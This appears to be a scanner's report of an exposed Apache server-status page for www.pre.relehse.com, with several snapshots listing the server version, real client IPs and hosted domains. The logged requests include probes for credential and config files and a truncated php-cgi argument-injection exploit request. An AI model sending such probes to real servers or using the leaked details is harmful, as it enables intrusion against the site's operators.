142.93.64.15http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-7836982750/2/143437_ 0.0600223070400.00.002713.34 161.35.190.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 3-7836982750/1/142562_ 0.0900309535870.00.002815.10 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 3-7836982750/2/143553_ 0.0600206228890.00.032744.94 142.93.64.15http/1.1 3-7836982750/3/141011_ 0.0800215549080.00.022782.35 142.93.64.15http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-7836982750/0/143662_ 0.0000271037320.00.002717.05 167.172.232.142h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-7836982750/3/142678W 0.0700249758020.00.022834.93 142.93.64.15http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-7836982750/1/146457_ 0.0800223071710.00.002809.53 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 4-7836982740/2/133893_ 0.0510189032790.00.002447.59 167.99.8.63http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-7836982740/1/132425_ 0.0530219986680.00.002417.50 167.99.8.63http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 4-7836982740/1/135335_ 0.0500190988280.00.002494.92 167.99.8.63http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-7836982740/1/133257_ 0.0430197714400.00.002466.08 161.35.190.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-7836982740/1/136187_ 0.0500189705670.00.002453.55 161.35.190.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 4-7836982740/1/133189_ 0.0520182958310.00.002561.35 142.93.64.15h2done, streams: 0/0
The server-status page (usually /server-status) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27c7dc1d88
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 09-Jan-2026 15:38:27 CET Restart Time: Wednesday, 31-Dec-2025 22:29:29 CET Parent Server Config. Generation: 137 Parent Server MPM Generation: 136 Server uptime: 8 days 17 hours 8 minutes 58 seconds Server load: 0.13 0.06 0.02 Total accesses: 151504 - Total Traffic: 5.2 GB - Total Duration: 116695233 CPU Usage: u35.65 s40.24 cu1091.05 cs827.26 - .265% CPU load .201 requests/sec - 7.2 kB/second - 35.8 kB/request - 770.245 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01952857no1yes19000 11952856no1yes010000 21952855no1yes010000 31952858no1yes19000 41952988no1yes010000 Sum505 248000 W_________________________________R_______________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-13619528570/60/2865W 5.920016603080.03.4392.89 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-13619528570/68/2805_ 5.973013223870.02.1695.35 172.70.162.176h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-13619528570/68/2840_ 5.92339119394430.04.5380.73 198.41.230.78h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-13619528570/60/2835_ 5.8114015490400.012.84134.71 172.71.241.50h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-13619528570/71/2856_ 6.0214025280990.010.73107.39 172.71.178.79h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-13619528570/72/2749_ 5.9514014706510.04.8783.98 172.70.90.35h2lcftech.es:443idle, streams: 1/1/1/0/0 (open/recv/resp/push/rst) 0-13619528570/75/2800_ 6.05841817720330.025.65115.08 172.68.12.235h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-13619528570/79/2810_ 6.031451431444670.03.0483.42 198.41.230.79h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-13619528570/65/2791_ 6.0414042664250.013.3286.86 172.70.90.35h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-13619528570/60/2733_ 5.941539514828570.02.04123.36 141.101.98.239h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-13619528560/58/2681_ 4.799015877060.01.4592.94 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 1-13619528560/44/2749_ 4.7712023385620.01.11122.43 172.70.86.47h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-13619528560/62/2666_ 4.7911019333860.03.86143.52 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 1-13619528560/41/2733_ 4.7911034887300.02.6398.77 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 1-13619528560/60/2659_ 4.798018556660.08.9279.90 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 1-13619528560/51/2650_ 4.791012067910.01.6795.55 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 1-13619528560/53/2715_ 4.799036670930.01.44113.07 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 1-13619528560/50/2719_ 4.811039979170.01.17110.87 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-13619528560/49/2634_ 4.809014512860.01.56119.99 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 1-13619528560/41/2651_ 4.7811018285780.02.8098.29 172.64.192.102h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-13619528550/21/3152_ 3.2417043599290.022.0990.55 172.70.163.7h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-13619528550/21/3127_ 3.2221025951340.01.1777.34 172.68.186.42h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-13619528550/17/3111_ 3.1712024525910.00.30102.07 172.70.193.204h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-13619528550/27/3201_ 3.1717014577250.01.08130.02 172.70.193.180h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-13619528550/23/3153_ 3.1716029444240.00.7588.27 172.70.193.179h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-13619528550/16/3244_ 3.2412027336990.00.4566.60 172.69.194.97h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-13619528550/14/3113_ 3.1716022423950.00.4771.28 172.70.193.171h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-13619528550/24/3163_ 3.2421021167880.01.1283.21 141.101.98.214h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-13619528550/25/3141_ 3.1716020864710.01.75125.27 172.70.193.211h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-13619528550/15/3208_ 3.2221016548630.00.3395.47 172.69.194.69h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-13619528580/21/3260_ 3.246038070090.01.02103.73 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-13619528580/29/3244_ 3.240015931610.01.18104.71 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-13619528580/27/3220_ 3.237019277930.01.67112.34 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 3-13619528580/31/3291_ 3.233017221650.01.09145.00 162.158.216.220h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-13619528580/26/3292R 3.2310028015680.00.76147.57 104.23.237.82http/1.1lcftech.es:443 3-13619528580/21/3234_ 3.20102123122860.00.3690.87 188.114.111.208h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-13619528580/23/3267_ 3.246027970240.00.23104.44 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-13619528580/25/3209_ 3.093062035380.00.41122.73 172.70.193.195h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-13619528580/25/3213_ 3.126054179970.00.40148.58 159.89.174.87http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-13619528580/22/3247_ 3.215137176130.01.7691.01 141.101.98.16h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-13619529880/42/3279_ 4.524019878890.01.49117.40 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-13619529880/39/3148_ 4.442014712460.03.3178.53 172.70.193.138h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-13619529880/57/3241_ 4.4616012073800.03.57107.36 172.70.193.203h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-13619529880/45/3215_ 4.5121011564520.04.67108.69 172.71.178.91h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-13619529880/43/3222_ 4.4683016036830.01.77113.29 172.70.193.189h2lcftech.es:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 4-13619529880/46/3273_ 4.460017348560.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27a545424f
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 02-Jan-2026 13:56:14 CET Restart Time: Wednesday, 31-Dec-2025 22:29:29 CET Parent Server Config. Generation: 14 Parent Server MPM Generation: 13 Server uptime: 1 day 15 hours 26 minutes 45 seconds Server load: 0.03 0.06 0.02 Total accesses: 27028 - Total Traffic: 672.2 MB - Total Duration: 20741274 CPU Usage: u25 s23.22 cu149.08 cs122.65 - .225% CPU load .19 requests/sec - 4963 B/second - 25.5 kB/request - 767.4 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01822018no0yes010000 11822019no0yes010000 21822020no0yes010000 31822021no0yes010000 41822151no0yes19000 Sum500 149000 ________________________________________W_________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-1318220180/24/125_ 6.42220243870.00.122.79 142.93.129.190http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql/api HTTP/1.1 0-1318220180/20/117_ 6.177010123990.00.052.11 162.159.98.7h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-1318220180/18/116_ 5.16220120460.00.0914.02 141.101.98.215h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-1318220180/21/121_ 6.17150190070.00.252.32 172.71.215.151h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-1318220180/19/106_ 6.183690151490.00.222.42 162.159.98.231h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-1318220180/18/106_ 6.42150160340.00.353.48 142.93.129.190http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 0-1318220180/21/112_ 6.4200260380.00.201.81 142.93.129.190http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-1318220180/13/113_ 6.303700147780.00.101.60 43.153.26.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-1318220180/17/103_ 6.177000169190.00.521.57 162.158.193.87h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-1318220180/16/116_ 6.177000134150.00.072.92 162.159.98.142h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-1318220190/58/387_ 7.8470111334770.01.369.84 162.158.193.26h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-1318220190/62/399_ 7.886392027635150.00.9213.65 162.158.87.23h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-1318220190/71/416_ 7.85467310362610.00.8730.22 162.159.98.205h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-1318220190/56/409_ 7.67634015049950.01.8810.15 4.196.77.48http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-1318220190/72/423_ 7.8470125191540.01.158.99 162.159.98.145h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-1318220190/63/401_ 7.676341031355200.01.749.15 4.196.77.48http/1.1barrerasdecontencion.com:443GET /wp-admin/maint/about.php HTTP/1.1 1-1318220190/65/411_ 7.99368317214960.01.7030.05 43.153.26.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-1318220190/69/424_ 7.86368010536370.01.0625.05 162.158.193.136h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-1318220190/63/403_ 7.9546712812060.01.237.75 103.23.60.244h27f7ffb32-1f6e-4d16-bdaa-07377bcidle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-1318220190/60/427_ 7.6770105409790.00.7121.96 4.196.77.48http/1.1barrerasdecontencion.com:443GET /wp-includes/fonts/ HTTP/1.1 2-1318220200/67/429_ 7.871401372100.00.446.65 142.93.129.190http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 2-1318220200/69/441_ 7.871501649460.01.459.39 142.93.129.190http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 2-1318220200/70/411_ 7.631201382350.013.6019.98 103.23.60.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-1318220200/72/441_ 7.871201394960.00.9010.16 142.93.129.190http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 2-1318220200/76/420_ 7.88101246150.00.787.49 142.93.129.190http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-1318220200/80/448_ 7.881001610620.00.918.65 142.93.129.190http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 2-1318220200/68/421_ 7.8313341326140.00.666.37 172.71.172.105h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-1318220200/72/420_ 7.471501573010.00.539.24 172.71.210.215h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-1318220200/65/420_ 7.701001327020.01.2723.91 188.114.111.194h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-1318220200/74/453_ 7.75144741444490.00.7011.78 104.23.168.65h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-1318220210/19/509_ 4.9934001130810.00.117.49 216.244.66.238http/1.1 3-1318220210/16/517_ 4.9870001444930.00.179.34 172.70.86.214h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-1318220210/18/509_ 5.9670001595490.00.869.18 162.158.162.3h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-1318220210/20/527_ 5.9969901256030.00.3214.61 162.158.114.155h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-1318220210/23/518_ 6.00901808880.00.2913.29 162.158.178.229h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-1318220210/18/493_ 6.32901419830.00.268.22 142.93.129.190http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-1318220210/14/518_ 6.017004051437690.00.389.23 172.70.47.114h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-1318220210/22/516_ 6.18340138580340.00.4116.30 216.244.66.238http/1.1barrerasdecontencion.com:443GET /robots.txt HTTP/1.1 3-1318220210/16/518_ 6.0070001213780.00.437.12 162.158.193.92h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-1318220210/18/515_ 6.0069901425020.00.227.94 162.158.178.161h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-1318221510/162/1286W 10.08003606310.02.4334.84 142.93.129.190http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-1318221510/162/1196_ 10.08606113180.02.0918.74 142.93.129.190http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 4-1318221510/173/1202_ 10.08403549050.02.9536.86 142.93.129.190http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 4-1318221510/169/1246_ 10.09304606290.02.8021.92 142.93.129.190http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-1318221510/171/1272_ 10.09508270750.02.3719.45 142.93.129.190http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-1318221510/160/1222_ 10.08107663880.02.7517.62 142.93.129.190http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27bfe21510
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 26-Dec-2025 11:41:04 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 64 Parent Server MPM Generation: 63 Server uptime: 13 days 4 hours 36 minutes 58 seconds Server load: 0.34 0.27 0.20 Total accesses: 360864 - Total Traffic: 11.7 GB - Total Duration: 373481417 CPU Usage: u69.15 s70.64 cu2039.13 cs1271.08 - .303% CPU load .317 requests/sec - 10.7 kB/second - 33.9 kB/request - 1034.96 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01299522no1yes010000 11299392no0yes010000 21299390no0yes010000 31299391no0yes010000 41299389no2yes19001 Sum503 149001 ____________________________________________W_____ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-6312995220/282/8088_ 19.3751235937680.03.97291.34 77.225.201.248h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-6312995220/307/8548_ 19.378046986110.03.65274.44 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-6312995220/305/8062_ 19.369075197580.05.86261.95 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 0-6312995220/293/8296_ 19.347040656290.032.12252.89 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql/api HTTP/1.1 0-6312995220/314/8063_ 19.3411038051050.06.34196.15 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api HTTP/1.1 0-6312995220/287/8282_ 19.370084714150.03.78231.77 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 0-6312995220/299/8117_ 19.3712043272710.010.67353.95 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 0-6312995220/304/8470_ 19.350048385110.05.80232.89 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-6312995220/293/8038_ 19.3710093609820.026.34358.80 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 0-6312995220/298/8264_ 19.351342238606440.03.69258.27 172.70.50.110h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6312993920/72/6160_ 11.051268031027590.00.74249.94 162.159.122.225h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6312993920/83/6086_ 11.031268037556360.00.67170.26 172.70.108.140h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6312993920/66/5987_ 11.021268045500490.00.40196.17 172.70.108.157h2lcftech.es:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-6312993920/78/5929_ 11.021268033641660.00.60119.87 172.70.108.203h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6312993920/72/6188_ 11.031268038575400.00.61194.11 172.70.108.157h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6312993920/82/6024_ 11.051268043657550.00.85189.30 162.158.22.53h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6312993920/82/5978_ 11.0312680153216290.00.96169.86 162.158.22.226h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6312993920/72/6070_ 11.051268042094560.00.36186.90 172.68.234.61h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6312993920/81/5989_ 11.041268068772000.00.67225.56 172.68.234.24h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6312993920/82/6197_ 11.031268043334160.01.05141.00 162.158.22.74h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/223/6876_ 17.231269040958380.02.16302.23 172.68.234.13h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/215/6847_ 17.0112680859619080.02.83255.93 172.69.168.220h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/234/6955_ 17.231269043611030.03.58224.26 162.159.122.144h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/229/6931_ 17.231269090997930.03.03199.74 162.159.122.157h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/241/6911_ 17.23918344217110.02.31284.30 185.102.115.120http/1.1 2-6312993900/226/7031_ 17.231273036942180.04.33250.83 172.68.234.70h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/234/6943_ 17.389183353715050.05.16288.98 185.102.115.120http/1.1relehse.com:443GET /txets.php HTTP/1.1 2-6312993900/233/6972_ 17.221268043192350.02.56222.34 172.70.108.75h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/222/6793_ 17.231269040765370.04.09287.82 172.68.234.164h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6312993900/224/7092_ 17.221268049462360.015.04223.42 172.68.234.169h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/45/8678_ 12.7224531753592330.01.01270.15 108.162.249.91h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/46/8512_ 12.7223832167225670.00.47260.89 108.162.249.91h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 3-6312993910/43/8400_ 12.73229367132787400.00.50307.45 108.162.249.91h2tandemsl.com:443idle, streams: 0/5/5/0/0 (open/recv/resp/push/rst) 3-6312993910/48/8560_ 12.7323535959488930.01.09268.13 108.162.249.91h2tandemsl.com:443idle, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 3-6312993910/37/8802_ 12.33222157526970.01.35297.44 162.159.122.68h2lcftech.es:443done, streams: 0/6/6/0/0 (open/recv/resp/push/rst) 3-6312993910/44/8379_ 12.34559055594310.00.37253.94 172.68.234.166h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/38/8604_ 12.73227323182921380.01.23248.56 108.162.249.91h2tandemsl.com:443idle, streams: 0/6/6/0/0 (open/recv/resp/push/rst) 3-6312993910/48/8764_ 12.7224237360626190.00.91381.49 108.162.249.91h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-6312993910/42/8671_ 12.33558057288810.00.37304.57 172.70.108.194h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6312993910/48/8577_ 12.6022243350233710.08.10255.90 172.70.50.110h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-6312993890/121/6250_ 12.8120169517800.00.55251.54 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 4-6312993890/112/6076_ 12.832047587280.00.83164.30 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-6312993890/108/6265_ 12.842065657370.00.95215.77 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-6312993890/150/6338_ 12.831048787220.00.72239.76 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 4-6312993890/107/6295W 12.830042101530.00.55179.14 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-631299389
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27e6915f36
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 24-Dec-2025 06:36:18 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 54 Parent Server MPM Generation: 53 Server uptime: 10 days 23 hours 32 minutes 12 seconds Server load: 0.00 0.00 0.00 Total accesses: 323440 - Total Traffic: 10.7 GB - Total Duration: 244805631 CPU Usage: u29.63 s37.08 cu1834.48 cs1101.24 - .316% CPU load .341 requests/sec - 11.8 kB/second - 34.7 kB/request - 756.881 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01125518no0yes010000 11125649no0yes19000 21125517no0yes010000 31125519no0yes010000 41125516no1yes010000 Sum501 149000 _______________W__________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-5311255180/1/6975_ 1.6721032930200.00.00268.11 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/gql HTTP/1.1 0-5311255180/1/7421_ 0.9421138285700.00.00228.09 172.70.110.17h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 